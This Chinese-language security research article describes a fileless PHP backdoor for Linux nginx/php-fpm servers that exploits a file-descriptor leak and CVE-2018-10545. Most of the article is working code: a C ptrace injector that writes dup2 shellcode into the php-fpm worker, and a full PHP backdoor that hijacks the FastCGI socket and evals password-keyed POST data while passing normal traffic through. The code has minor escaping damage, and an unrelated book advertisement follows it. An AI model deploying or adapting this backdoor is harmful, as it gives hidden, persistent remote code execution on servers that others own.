作者:imbeee @360 观星实验室
目前常见的 php 后门基本需要文件来维持(常规php脚本后门:一句话、大马等各种变形;WebServer模块:apache扩展等,需要高权限并且需要重启WebServer),或者是脚本运行后删除自身,利用死循环驻留在内存里,不断主动外连获取指令并且执行。两者都无法做到无需高权限、无需重启WeServer、触发后删除脚本自身并驻留内存、无外部进程、能主动发送控制指令触发后门(避免内网无法外连的情况)。
而先前和同事一块测试 Linux 下面通过/proc/PID/fd文件句柄来利用php文件包含漏洞时,无意中发现了一个有趣的现象。经过后续的分析,可以利用其在特定环境下实现受限的无文件后门,效果见动图:
CentOS 7.5.1804 x86_64
nginx + php-fpm(监听在tcp 9000端口)
# /etc/php-fpm.d/www.conf pm.start_servers = 1 pm.min_spare_servers = 1 pm.max_spare_servers = 1
[root@localhost php-fpm.d]# ps -ef|grep php-fpm nginx 2439 30354 0 18:40 ? 00:00:00 php-fpm: pool www root 30354 1 0 Oct15 ? 00:00:37 php-fpm: master process (/etc/php-fpm.conf)
<?php // t1.php system("sleep 60");
[root@localhost php-fpm.d]# ls -al /proc/2439/fd total 0 dr-x------ 2 nginx nginx 0 Oct 24 18:54 . dr-xr-xr-x 9 nginx nginx 0 Oct 24 18:40 .. lrwx------ 1 nginx nginx 64 Oct 24 18:54 0 -> socket:[1168542] lrwx------ 1 nginx nginx 64 Oct 24 18:54 1 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 24 18:54 2 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 24 18:54 7 -> anon_inode:[eventpoll] [root@localhost php-fpm.d]#
[root@localhost php-fpm.d]# lsof -i:9000 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME php-fpm 2439 nginx 0u IPv4 1168542 0t0 TCP localhost:cslistener (LISTEN) php-fpm 30354 root 6u IPv4 1168542 0t0 TCP localhost:cslistener (LISTEN)
[root@localhost php-fpm.d]# ps -ef|grep sleep nginx 2547 2439 0 18:57 ? 00:00:00 sleep 60 [root@localhost php-fpm.d]# ls -al /proc/2547/fd total 0 dr-x------ 2 nginx nginx 0 Oct 24 18:58 . dr-xr-xr-x 9 nginx nginx 0 Oct 24 18:57 .. lrwx------ 1 nginx nginx 64 Oct 24 18:58 0 -> socket:[1168542] l-wx------ 1 nginx nginx 64 Oct 24 18:58 1 -> pipe:[1408640] lrwx------ 1 nginx nginx 64 Oct 24 18:58 2 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 24 18:58 3 -> socket:[1408425] lrwx------ 1 nginx nginx 64 Oct 24 18:58 7 -> anon_inode:[eventpoll] [root@localhost php-fpm.d]# ls -al /proc/2439/fd total 0 dr-x------ 2 nginx nginx 0 Oct 24 18:54 . dr-xr-xr-x 9 nginx nginx 0 Oct 24 18:40 .. lrwx------ 1 nginx nginx 64 Oct 24 18:54 0 -> socket:[1168542] lrwx------ 1 nginx nginx 64 Oct 24 18:54 1 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 24 18:54 2 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 24 18:58 3 -> socket:[1408425] lr-x------ 1 nginx nginx 64 Oct 24 18:58 4 -> pipe:[1408640] lrwx------ 1 nginx nginx 64 Oct 24 18:54 7 -> anon_inode:[eventpoll]
可以发现请求t1.php后,nginx发起了一个fast-cgi请求到php-fpm进程,即woker进程里3号句柄 socket:[1408425]
。同时可以看到sleep继承了父进程php-fpm的0 1 2 3 7号句柄,其中的0号句柄也就是php-fpm监听的9000端口的socket句柄。
// test.c // gcc -o test test.c #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> int main(int argc, char *argv[]) { int sockfd, newsockfd, clilen; struct sockaddr_in cli_addr; clilen = sizeof(cli_addr); sockfd = 0; //直接使用0句柄作为socket句柄 //这里accept会阻塞,接受连接后才会执行system() newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen); system("/bin/touch /tmp/lol"); return 0; }
<?php // t2.php system("/tmp/test");
[root@localhost html]# ps -ef|grep php-fpm nginx 2548 30354 0 Oct24 ? 00:00:00 php-fpm: pool www nginx 2958 30354 0 11:07 ? 00:00:00 php-fpm: pool www root 30354 1 0 Oct15 ? 00:00:40 php-fpm: master process (/etc/php-fpm.conf) [root@localhost html]# ps -ef|grep test nginx 2957 2548 0 11:07 ? 00:00:00 /tmp/test [root@localhost html]# strace -p 2548 strace: Process 2548 attached read(4, [root@localhost html]# strace -p 2957 strace: Process 2957 attached accept(0, [root@localhost html]# strace -p 2958 strace: Process 2958 attached accept(0,
可以看到php-fpm多了一个worker进程,用于测试的子进程test(pid:2957)阻塞在accept函数,解析t2.php的这个worker进程(pid:2548)阻塞在php的system函数里,系统调用体现为阻塞在read(),即等待system函数返回,因此master进程spawn出新的worker进程来处理正常的fast-cgi请求。此时php-fpm监听在tcp 9000的这个socket句柄上有两个进程在accept等待新的连接,一个是正常的php-fpm worker(pid:2958)进程,另一个是我们的测试程序test。
[root@localhost html]# ls -al /tmp/systemd-private-165040c986624007be902da008f27727-php-fpm.service-6HI0kT/tmp/ total 12 drwxrwxrwt 2 root root 29 Oct 25 11:27 . drwx------ 3 root root 17 Oct 15 10:40 .. -rw-r--r-- 1 nginx nginx 0 Oct 25 11:27 lol -rwxr-xr-x 1 root root 8496 Oct 25 10:42 test
- php脚本先删除自身,然后用system()等方法运行一个外部程序
- 外部程序起来后删除自身,驻留在内存里,直接accpet从0句柄接受来自nginx的fast-cgi请求
- 解析fast-cgi请求,如果含有特定的指令,拦截请求并执行相应的代码,否则认为是正常请求,转发到9000端口让正常的php-fpm worker处理
php-fpm解析php脚本,是在php-fpm的worker进程里进行的,也就是说理论上php代码是能访问到worker进程已经打开的文件句柄的。但是php对这块做了封装,在php里通过fopen、socket_create等操作文件、socket时,得到的是一个php resource,每个resource绑定了相应的文件句柄,我们是无法直接操作到文件句柄的。可以通过下面的php脚本简单观察一下:
<?php // t3.php sleep(10); $socket = socket_create( AF_INET, SOCK_STREAM, SOL_TCP ); sleep(10);
访问t3.php后,查看php-fpm worker进程的文件句柄:
[root@localhost html]# ls -al /proc/2958/fd total 0 dr-x------ 2 nginx nginx 0 Oct 25 11:16 . dr-xr-xr-x 9 nginx nginx 0 Oct 25 11:07 .. lrwx------ 1 nginx nginx 64 Oct 25 11:16 0 -> socket:[1168542] lrwx------ 1 nginx nginx 64 Oct 25 11:16 1 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 11:16 2 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 12:11 3 -> socket:[1428118] lrwx------ 1 nginx nginx 64 Oct 25 11:16 7 -> anon_inode:[eventpoll] [root@localhost html]# ls -al /proc/2958/fd total 0 dr-x------ 2 nginx nginx 0 Oct 25 11:16 . dr-xr-xr-x 9 nginx nginx 0 Oct 25 11:07 .. lrwx------ 1 nginx nginx 64 Oct 25 11:16 0 -> socket:[1168542] lrwx------ 1 nginx nginx 64 Oct 25 11:16 1 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 11:16 2 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 12:11 3 -> socket:[1428118] lrwx------ 1 nginx nginx 64 Oct 25 12:11 4 -> socket:[1428132] lrwx------ 1 nginx nginx 64 Oct 25 11:16 7 -> anon_inode:[eventpoll]
如果我们能在php代码中构造出一个和0号句柄绑定的socket resource,我们就能直接用php的accpet()来处理来自nginx的fast-cgi请求而无需再起一个新的进程。但是翻遍了资料,最后发现php里无法用常规的方式构造指向特定文件句柄的resource。
但是我们发现worker进程在/proc/下面的文件owner并不是root,而是php-fpm的运行用户。这说明了php-fpm的master在fork出worker进程后,没有正确处理其dumpable flag,导致了我们可以用php-fpm worker的运行用户的权限附加到worker上,对其进行操作。
- php脚本运行后先删除自身
- php脚本里用socket_create()创建一个socket
- php脚本释放一个外部程序,使用system()调用,此时子进程继承worker进程的运行权限
- 子进程attach到父进程(php-fpm worker),向父进程中注入shellcode,使用dup2()系统调用将0号句柄复制到步骤2中所创建的socket对应的句柄号,并恢复worker进程状态后detach,退出
- 子进程退出后,php代码里已经可以通过我们创建的socket resource来操作0号句柄,对其使用accept获取来自nginx的fast-cgi连接
- 解析fast-cgi请求,如果含有特定的指令,拦截请求并执行相应的代码,否则认为是正常请求,转发到9000端口让正常的php-fpm worker处理
// dup04.c // gcc -o dup04 dup04.c #include <stdio.h> #include <stdlib.h> #include <memory.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <sys/user.h> void *freeSpaceAddr(pid_t pid) { FILE *fp; char filename[30]; char line[850]; long addr; char str[20]; char perms[5]; sprintf(filename, "/proc/%d/maps", pid); fp = fopen(filename, "r"); if(fp == NULL) exit(1); while(fgets(line, 850, fp) != NULL) { sscanf(line, "%lx-%*lx %s %*s %s %*d", &addr, perms, str); if(strstr(perms, "x") != NULL) { break; } } fclose(fp); return addr; } void ptraceRead(int pid, unsigned long long addr, void *data, int len) { long word = 0; int i = 0; char *ptr = (char *)data; for (i=0; i < len; i+=sizeof(word), word=0) { if ((word = ptrace(PTRACE_PEEKTEXT, pid, addr + i, NULL)) == -1) {; printf("[!] Error reading process memoryn"); exit(1); } ptr[i] = word; } } void ptraceWrite(int pid, unsigned long long addr, void *data, int len) { long word = 0; int i=0; for(i=0; i < len; i+=sizeof(word), word=0) { memcpy(&word, data + i, sizeof(word)); if (ptrace(PTRACE_POKETEXT, pid, addr + i, word) == -1) {; printf("[!] Error writing to process memoryn"); exit(1); } } } int main(int argc, char* argv[]) { void *freeaddr; //int pid = strtol(argv[1],0,10); int pid = getppid(); int status; struct user_regs_struct oldregs, regs; memset(&oldregs, 0, sizeof(struct user_regs_struct)); memset(®s, 0, sizeof(struct user_regs_struct)); char shellcode[] = "x90x90x90x90x90x6ax21x58x48x31xffx6ax04x5ex0fx05xcc"; unsigned char *oldcode; // Attach to the target process ptrace(PTRACE_ATTACH, pid, NULL, NULL); waitpid(pid, &status, WUNTRACED); // Store the current register values for later ptrace(PTRACE_GETREGS, pid, NULL, &oldregs); memcpy(®s, &oldregs, sizeof(struct user_regs_struct)); oldcode = (unsigned char *)malloc(sizeof(shellcode)); // Find a place to write our code to freeaddr = (void *)freeSpaceAddr(pid) + sizeof(long); // Read from this addr to back up our code ptraceRead(pid, (unsigned long long)freeaddr, oldcode, sizeof(shellcode)); // Write our new stub //ptraceWrite(pid, (unsigned long long)freeaddr, "/tmp/inject.sox00", 16); //ptraceWrite(pid, (unsigned long long)freeaddr+16, "x90x90x90x90x90x90x90", 8); ptraceWrite(pid, (unsigned long long)freeaddr, shellcode, sizeof(shellcode)); // Update RIP to point to our code regs.rip = (unsigned long long)freeaddr + 2; // Set regs ptrace(PTRACE_SETREGS, pid, NULL, ®s); //sleep(5); // Continue execution ptrace(PTRACE_CONT, pid, NULL, NULL); waitpid(pid, &status, WUNTRACED); // Ensure that we are returned because of our int 0x3 trap if (WIFSTOPPED(status) && WSTOPSIG(status) == SIGTRAP) { // Get process registers, indicating if the injection suceeded ptrace(PTRACE_GETREGS, pid, NULL, ®s); if (regs.rax != 0x0) { printf("[*] Syscall for dup2 success.n"); } else { printf("[!] Library could not be injectedn"); return 0; } //// Now We Restore The Application Back To It's Original State //// // Copy old code back to memory ptraceWrite(pid, (unsigned long long)freeaddr, oldcode, sizeof(shellcode)); // Set registers back to original value ptrace(PTRACE_SETREGS, pid, NULL, &oldregs); // Resume execution in original place ptrace(PTRACE_DETACH, pid, NULL, NULL); printf("[*] Resume proccess.n"); } else { printf("[!] Fatal Error: Process stopped for unknown reasonn"); exit(1); } return 0; }
5: 6a 21 pushq $0x21 7: 58 pop %rax 8: 48 31 ff xor %rdi,%rdi b: 6a 04 pushq $0x4 d: 5e pop %rsi e: 0f 05 syscall 10: cc int3
<?php // t4.php sleep(10); $socket = socket_create( AF_INET, SOCK_STREAM, SOL_TCP ); sleep(10); system('/tmp/dup04'); sleep(10);
[root@localhost html]# ls -al /proc/3022/fd total 0 dr-x------ 2 nginx nginx 0 Oct 25 16:12 . dr-xr-xr-x 9 nginx nginx 0 Oct 25 16:12 .. lrwx------ 1 nginx nginx 64 Oct 25 17:50 0 -> socket:[1168542] lrwx------ 1 nginx nginx 64 Oct 25 17:50 1 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 17:50 2 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 17:59 3 -> socket:[1428126] lrwx------ 1 nginx nginx 64 Oct 25 17:50 7 -> anon_inode:[eventpoll] [root@localhost html]# ls -al /proc/3022/fd total 0 dr-x------ 2 nginx nginx 0 Oct 25 16:12 . dr-xr-xr-x 9 nginx nginx 0 Oct 25 16:12 .. lrwx------ 1 nginx nginx 64 Oct 25 17:50 0 -> socket:[1168542] lrwx------ 1 nginx nginx 64 Oct 25 17:50 1 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 17:50 2 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 17:59 3 -> socket:[1428126] lrwx------ 1 nginx nginx 64 Oct 25 17:59 4 -> socket:[1435131] lrwx------ 1 nginx nginx 64 Oct 25 17:50 7 -> anon_inode:[eventpoll] [root@localhost html]# ls -al /proc/3022/fd total 0 dr-x------ 2 nginx nginx 0 Oct 25 16:12 . dr-xr-xr-x 9 nginx nginx 0 Oct 25 16:12 .. lrwx------ 1 nginx nginx 64 Oct 25 17:50 0 -> socket:[1168542] lrwx------ 1 nginx nginx 64 Oct 25 17:50 1 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 17:50 2 -> /dev/null lrwx------ 1 nginx nginx 64 Oct 25 17:59 3 -> socket:[1428126] lrwx------ 1 nginx nginx 64 Oct 25 17:59 4 -> socket:[1168542] lrwx------ 1 nginx nginx 64 Oct 25 17:50 7 -> anon_inode:[eventpoll]
可以看到worker进程在前10秒内只有来自nginx的一个3号句柄;10-20秒多出来的4号句柄socket:[1435131]为php代码中socket_create后创建的socket;20秒后dup4运行结束,dup(0,2)成功调用,0号句柄的socket:[1168542]成功复制到4号句柄。此时php代码中已经可以通过$socket来操作php-fpm监听tcp 9000的socket了。
<?php $password = "beedoor"; function dolog($msg) { file_put_contents('/tmp/log', date('Y-m-d H:i:s') . ' ---- ' . $msg . "n", FILE_APPEND); } function readfcgi($socket, $type) { global $password; $buffer=""; $postdata=""; while(1) { dolog("Read 8 bytes header."); $data = socket_read($socket, 8); if ($data === "") return -1; $buffer .= $data; dolog(bin2hex($data)); $header = unpack("Cver/Ctype/nid/nlen/Cpadding/Crev", $data); $body_len = $header["len"] + $header["padding"]; if ($body_len > 0) { dolog("Read " . $body_len . " bytes body."); $data = socket_read($socket, $body_len); if ($data === "") return -1; $buffer .= $data; dolog(bin2hex($data)); if ($header["type"] == 5) { $postdata .= $data; dolog("Post data found."); } } if ($header["type"] == $type && $body_len < 65535) { $stype = $type === 5 ? 'FCGI_STDIN' : 'FCGI_END_REQUEST'; dolog($stype . " finished, braek."); break; } } //dolog(bin2hex($postdata)); parse_str($postdata, $post_array); $intercept_flag = array_key_exists($password, $post_array) ? true : false; if ($intercept_flag) { dolog("Password in postdata, intercepted."); return array("intercept" => true, "buffer" => $postdata); } else { dolog("No password, passthrough."); return array("intercept" => false, "buffer" => $buffer); } } dolog("Init socket rescoure."); $socket = socket_create( AF_INET, SOCK_STREAM, SOL_TCP ); dolog("dup(0,4);"); system('/tmp/dup04'); dolog("All set, waiting for connections."); while (1) { $acpt=socket_accept($socket); dolog("Incoming connection."); $buffer = readfcgi($acpt,5); if ($buffer["intercept"] === true) { parse_str($buffer["buffer"], $postdata); $header = ""; $outbuffer = "Content-type: text/htmlrnrn"; ob_clean(); ob_start(); eval($postdata[$password]); $outbuffer .= ob_get_clean(); dolog("Eval code success."); $outbuffer_len = strlen($outbuffer); dolog("Outbuffer length: " . $outbuffer_len . "bytes."); $slice_len = unpack("n", "x1fxf8"); $slice_len = $slice_len[1]; while ( strlen($outbuffer) > $slice_len ) { $slice = substr($outbuffer, 0, $slice_len); $header = pack("C2n2C2", 0x01, 0x06, 1, $slice_len, 0x00, 0x00); $sent_len = socket_write($acpt, $header, 8); dolog("Sending " . $sent_len . " bytes slice header."); dolog(bin2hex($header)); $sent_len = socket_write($acpt, $slice, $slice_len); dolog("Sending " . $sent_len . " bytes slice."); dolog(bin2hex($slice)); $outbuffer = substr($outbuffer, $slice_len); } $outbuffer_len = strlen($outbuffer); if ( $outbuffer_len % 8 > 0) $padding_len = 8 - ($outbuffer_len % 8); dolog("Processing last slice, outbuffer length: " . $outbuffer_len . " , padding length: " . $padding_len . " bytes."); $outbuffer .= str_repeat("", $padding_len); $header = pack("C2n2C2", 0x01, 0x06, 1, $outbuffer_len, $padding_len, 0x00); $sent_len = socket_write($acpt, $header, 8); dolog("Sent 8 bytes STDOUT header to webserver."); dolog(bin2hex($header)); $sent_len = socket_write($acpt, $outbuffer, strlen($outbuffer)); dolog("Sent " . $sent_len . " bytes STDOUT body to webserver."); dolog(bin2hex($outbuffer)); $header = pack("C2n2C2", 0x01, 0x03, 1, 8, 0x00, 0x00); $endbody = pack("C8", 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0); $sent_len = socket_write($acpt, $header, 8); dolog("Sent 8 bytes REQUEST_END header to webserver."); dolog(bin2hex($header)); $sent_len = socket_write($acpt, $endbody, 8); dolog("Sent 8 bytes REQUEST_END body to webserver."); dolog(bin2hex($endbody)); socket_shutdown($acpt); continue; } else { $buffer = $buffer["buffer"]; } dolog("The full buffer size is " . strlen($buffer) . " bytes."); $fpm_socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($fpm_socket === false) { dolog("Create socket for real php-fpm failed."); socket_close($acpt); } if (socket_connect($fpm_socket, "", 9000) === false) { dolog("Connect to real php-fpm failed."); socket_close($acpt); } dolog("Connected to real php-fpm."); $sent_len = socket_write($fpm_socket, $buffer, strlen($buffer)); dolog("Sent " . $sent_len . " to real php-fpm."); $buffer = readfcgi($fpm_socket, 3); //TODO: intercept real output $buffer = $buffer["buffer"]; dolog("Recieved " . strlen($buffer) . " from real php-fpm."); socket_close($fpm_socket); $sent_len = socket_write($acpt, $buffer); dolog("Sent " . $sent_len . " bytes back to webserver."); socket_shutdown($acpt); dolog("Shutdown connection from webserver."); }
上面给出的php实现,利用的前提是Linux下的php-fpm环境,同时有php版本限制,需5.x<5.6.35,7.0.x<7.0.29,7.1.x<7.1.16,7.2.x<7.2.4。因为利用到的两个前提条件中,worker进程未正确设置dumpable flag这个问题已经在CVE-2018-10545中修复,详情请自行查阅。而另一个条件,在php中通过system等函数来调用第三方程序时未正确处理文件描述符的问题,也已经提交给php官方,但php官方认为未能导致安全问题,不予处理。所以截止目前为止,最新版本的php-fpm都存在文件描述符泄露的问题。
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Donald E.Knuth / 人民邮电出版社 / 2010-10 / 119.00元
《计算机程序设计艺术》系列著作对计算机领域产生了深远的影响。这一系列堪称一项浩大的工程,自1962年开始编写,计划出版7卷,目前已经出版了4卷。《美国科学家》杂志曾将这套书与爱因斯坦的《相对论》等书并列称为20世纪最重要的12本物理学著作。目前Knuth正将毕生精力投入到这部史诗性著作的撰写中。想了解本书最新信息,请访http://www-cs-faculty.stanford.edu/~knut......一起来看看 《计算机程序设计艺术卷1:基本算法(英文版.第3版)》 这本书的介绍吧!